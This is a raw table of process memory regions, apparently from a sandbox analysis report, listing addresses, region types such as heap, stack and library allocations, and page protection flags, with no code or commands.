231B834B000
|
heap
|
page read and write
|
||
|
20021C7E000
|
heap
|
page read and write
|
||
|
7FFAAC700000
|
trusted library allocation
|
page read and write
|
||
|
20022303000
|
heap
|
page read and write
|
||
|
2002236D000
|
heap
|
page read and write
|
||
|
2002019C000
|
heap
|
page read and write
|
||
|
200201AF000
|
heap
|
page read and write
|
||
|
2002216B000
|
heap
|
page read and write
|
||
|
19CADA11000
|
trusted library allocation
|
page read and write
|
||
|
64880FE000
|
stack
|
page read and write
|
||
|
231B83E0000
|
heap
|
page read and write
|
||
|
231A02C1000
|
trusted library allocation
|
page read and write
|
||
|
6F614F7000
|
stack
|
page read and write
|
||
|
19C9D210000
|
trusted library allocation
|
page read and write
|
||
|
2002216C000
|
heap
|
page read and write
|
||
|
7FFAAC7B0000
|
trusted library allocation
|
page read and write
|
||
|
19C9B7E9000
|
heap
|
page read and write
|
||
|
20022070000
|
heap
|
page read and write
|
||
|
20021C48000
|
heap
|
page read and write
|
||
|
EAE000
|
stack
|
page read and write
|
||
|
20021C37000
|
heap
|
page read and write
|
||
|
19C9D1B0000
|
heap
|
page read and write
|
||
|
20022267000
|
heap
|
page read and write
|
||
|
2002216B000
|
heap
|
page read and write
|
||
|
20021C01000
|
heap
|
page read and write
|
||
|
7FFAAC730000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4D6000
|
trusted library allocation
|
page read and write
|
||
|
2B3F000
|
stack
|
page read and write
|
||
|
7FFAAC602000
|
trusted library allocation
|
page read and write
|
||
|
19C9D950000
|
heap
|
page execute and read and write
|
||
|
7FFAAC506000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C9F0FB000
|
trusted library allocation
|
page read and write
|
||
|
19C9D230000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC630000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC540000
|
trusted library allocation
|
page execute and read and write
|
||
|
19C9D8EE000
|
heap
|
page read and write
|
||
|
20022323000
|
heap
|
page read and write
|
||
|
20021C35000
|
heap
|
page read and write
|
||
|
2319E200000
|
heap
|
page read and write
|
||
|
2319FDB0000
|
heap
|
page execute and read and write
|
||
|
6F616FE000
|
stack
|
page read and write
|
||
|
648904E000
|
stack
|
page read and write
|
||
|
20022318000
|
heap
|
page read and write
|
||
|
7FFAAC414000
|
trusted library allocation
|
page read and write
|
||
|
20021C53000
|
heap
|
page read and write
|
||
|
648867B000
|
stack
|
page read and write
|
||
|
200220B8000
|
heap
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
||
|
19C9DC32000
|
trusted library allocation
|
page read and write
|
||
|
231B835E000
|
heap
|
page read and write
|
||
|
7FFAAC670000
|
trusted library allocation
|
page read and write
|
||
|
2319E490000
|
trusted library allocation
|
page read and write
|
||
|
20022270000
|
heap
|
page read and write
|
||
|
7FFAAC424000
|
trusted library allocation
|
page read and write
|
||
|
200220C8000
|
heap
|
page read and write
|
||
|
19C9D893000
|
heap
|
page read and write
|
||
|
6F6117E000
|
stack
|
page read and write
|
||
|
19C9D2A0000
|
trusted library allocation
|
page read and write
|
||
|
19C9D376000
|
heap
|
page read and write
|
||
|
2319E278000
|
heap
|
page read and write
|
||
|
2002216B000
|
heap
|
page read and write
|
||
|
20021C77000
|
heap
|
page read and write
|
||
|
7FFAAC690000
|
trusted library allocation
|
page read and write
|
||
|
19C9B7C0000
|
heap
|
page read and write
|
||
|
2002236E000
|
heap
|
page read and write
|
||
|
19C9E011000
|
trusted library allocation
|
page read and write
|
||
|
2002216B000
|
heap
|
page read and write
|
||
|
7FFB06950000
|
unkown
|
page read and write
|
||
|
7FFB0C745000
|
unkown
|
page readonly
|
||
|
200201B7000
|
heap
|
page read and write
|
||
|
19CB5B71000
|
heap
|
page read and write
|
||
|
19C9F3AD000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC4DC000
|
trusted library allocation
|
page execute and read and write
|
||
|
6F612FD000
|
stack
|
page read and write
|
||
|
2319E230000
|
heap
|
page read and write
|
||
|
6488279000
|
stack
|
page read and write
|
||
|
200220B8000
|
heap
|
page read and write
|
||
|
7FFAAC6F0000
|
trusted library allocation
|
page read and write
|
||
|
231A0760000
|
trusted library allocation
|
page read and write
|
||
|
C20000
|
heap
|
page read and write
|
||
|
1B274FE000
|
stack
|
page read and write
|
||
|
231B82BF000
|
heap
|
page read and write
|
||
|
7FFAAC6E0000
|
trusted library allocation
|
page read and write
|
||
|
19C9F6F6000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC6C0000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC43C000
|
trusted library allocation
|
page read and write
|
||
|
7FFB06950000
|
unkown
|
page read and write
|
||
|
19C9B820000
|
heap
|
page read and write
|
||
|
7FFAAC423000
|
trusted library allocation
|
page execute and read and write
|
||
|
20021C43000
|
heap
|
page read and write
|
||
|
64890CD000
|
stack
|
page read and write
|
||
|
1B276FE000
|
stack
|
page read and write
|
||
|
231A075E000
|
trusted library allocation
|
page read and write
|
||
|
19C9DE0E000
|
trusted library allocation
|
page read and write
|
||
|
6487FFF000
|
stack
|
page read and write
|
||
|
1B272FE000
|
stack
|
page read and write
|
||
|
20021C05000
|
heap
|
page read and write
|
||
|
1B271FF000
|
stack
|
page read and write
|
||
|
19C9D220000
|
heap
|
page readonly
|
||
|
D40000
|
heap
|
page read and write
|
||
|
28FC000
|
stack
|
page read and write
|
||
|
19C9B7E0000
|
heap
|
page read and write
|
||
|
7FFAAC710000
|
trusted library allocation
|
page read and write
|
||
|
20022323000
|
heap
|
page read and write
|
||
|
7FFB06930000
|
unkown
|
page readonly
|
||
|
19C9B826000
|
heap
|
page read and write
|
||
|
29FF000
|
stack
|
page read and write
|
||
|
19C9D8B5000
|
heap
|
page read and write
|
||
|
231A0183000
|
trusted library allocation
|
page read and write
|
||
|
7FFAAC5C2000
|
trusted library allocation
|
page read and write
|
||
|
19C9B83E000
|
heap
|
page read and write
|
||
|
7FFAAC6A0000
|
trusted library allocation
|
page read and write
|
There are 443 hidden memdumps, click here to show them.